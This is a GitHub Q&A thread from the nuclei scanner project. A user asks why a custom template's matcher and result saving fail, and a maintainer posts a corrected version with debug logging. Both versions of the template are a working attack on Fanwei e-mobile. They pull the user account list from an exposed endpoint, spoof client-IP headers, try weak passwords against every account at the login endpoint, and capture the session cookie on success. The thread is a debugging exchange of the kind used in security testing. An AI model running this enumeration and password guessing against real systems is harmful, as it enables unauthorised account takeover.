### DISCUSSION TITLE
when use flow,I want to save result to file,but not work

### DISCUSSION THREAD

**Discussion by anquanscan** [projectdiscovery/nuclei#4648] [Q&A]
<img width="2426" alt="image" src="https://github.com/projectdiscovery/nuclei/assets/5724472/05f30ccc-1c7e-440a-bc62-fe6effa7432d">
above show "matched":"0"，but this is my template
<img width="1015" alt="image" src="https://github.com/projectdiscovery/nuclei/assets/5724472/467dc7fa-9594-4b9b-a974-7b9f5dd94c82">
<img width="1162" alt="image" src="https://github.com/projectdiscovery/nuclei/assets/5724472/e4ca4c08-fe45-4c46-b903-c368018ea7cc">

this matche is does not work,this is my complete code 

```yaml
id: fanwei-e-mobile-users

info:
  name: fanwei-e-mobile-users
  author: fanwei-e-mobile-users
  severity: high


flow: |
  var passwordlist = ["123456","111111"]; 
  if(http(1) === true){
    
    for (let username of iterate(template["usernameList"])) {
        set("username", username);
        macthed = false
        for (let password of iterate(passwordlist)) {
            set("username", username);
            set("password", password);
            if (http(2) == true){
              log(template["http_1_host"]+" "+username+" "+password)
              macthed = true
            }
        }
        if (macthed == true){
          break
        }
    }
  }



http:
  - raw:
      - |
        GET /e-mobile/app/common/userselectNew/do.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
        Cache-Control: max-age=0
        Connection: close
        Upgrade-Insecure-Requests: 1
        X-Forwarded-For: 127.0.0.1
        X-Originating-IP: 127.0.0.1
        X-Remote-Addr: 127.0.0.1
        X-Remote-IP: 127.0.0.1

    extractors:
      - type: json
        part: body
        name: usernameList
        json:
          - '.[].USER_ACCOUNTS'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,'USER_ID','USER_ACCOUNTS','USER_NAME')

  - raw:
      - |
        POST /general/login/index.php?c=Login&a=loginCheck HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
        Connection: close
        
        username={{username}}&password={{password}}&userLang=cn&verify=&dynamiCode=

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(all_headers,'USER_NAME_COOKIE')

    extractors:
      - type: dsl
        dsl:
          - set_cookie
```

**Comment by anquanscan** [comment]
@tarunKoyalwar  help help help please。

**Comment by tarunKoyalwar** [comment]
@anquanscan , can you share more details , from what i understand you are saying the second request is not matching or returning true right ?

i have updated template to log return values of function to cli . for debugging purposes 

```yaml
id: fanwei-e-mobile-users

info:
  name: fanwei-e-mobile-users
  author: fanwei-e-mobile-users
  severity: high

# i replaced `http(1)` with `log(http(1))` temporarily to print if request matched
flow: |
  var passwordlist = ["123456","111111"];
  if(log(http(1))){
    for (let username of iterate(template["usernameList"])) {
        set("username", username);
        for (let password of iterate(passwordlist)) {
            set("password", password);
            if (log(http(2))){
              log(template["http_1_host"]+" "+username+" "+password)
              matched = true;
              break;
            }
        }
    }
  }

http:
  - raw:
      - |
        GET /e-mobile/app/common/userselectNew/do.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
        Cache-Control: max-age=0
        Connection: close
        Upgrade-Insecure-Requests: 1
        X-Forwarded-For: 127.0.0.1
        X-Originating-IP: 127.0.0.1
        X-Remote-Addr: 127.0.0.1
        X-Remote-IP: 127.0.0.1

    extractors:
      - type: json
        part: body
        name: usernameList
        json:
          - '.[].USER_ACCOUNTS'
        internal: true

    matchers-condition: and
    matchers:
      - type: status
        # internal: true # <- uncomment this line to disable printing to terminal on match
        status:
          - 200

      - type: dsl
        # internal: true # <- uncomment this line to disable printing to terminal on match
        dsl:
          - contains_all(body,'USER_ID','USER_ACCOUNTS','USER_NAME')

  - raw:
      - |
        POST /general/login/index.php?c=Login&a=loginCheck HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
        Connection: close
        
        username={{username}}&password={{password}}&userLang=cn&verify=&dynamiCode=

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - contains_all(all_headers,'USER_NAME_COOKIE')

    extractors:
      - type: dsl
        dsl:
          - set_cookie
```

just run this template with `-debug` flag and check if it was matched or not and other details
